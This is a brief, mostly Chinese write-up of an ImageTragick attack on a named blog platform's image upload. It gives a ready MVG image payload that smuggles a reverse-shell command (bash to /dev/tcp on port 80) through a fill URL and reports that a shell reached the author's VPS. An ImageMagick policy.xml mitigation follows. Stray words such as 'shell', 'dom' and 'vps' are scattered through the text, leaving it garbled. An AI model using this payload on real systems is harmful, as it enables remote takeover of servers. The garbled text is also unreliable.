Vulnerability exploit method are as follows:shell
新浪博客發圖片的地方
bash
選擇圖片
圖片內容爲
dom
code 區域tcp
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")' pop graphic-context
一步一步點到保存成功
url
開始上傳
code
shell躺在了vps上
xml
修復建議:vps
使用策略文件暫時禁用ImageMagick。可在「/etc/ImageMagick/policy.xml」文件中添加以下代碼:圖片
<policymap>
<policy domain=」coder」 rights=」none」 pattern=」EPHEMERAL」 />
<policy domain=」coder」 rights=」none」 pattern=」URL」 />
<policy domain=」coder」 rights=」none」 pattern=」HTTPS」 />
<policy domain=」coder」 rights=」none」 pattern=」MVG」 />
<policy domain=」coder」 rights=」none」 pattern=」MSL」 />
</policymap>get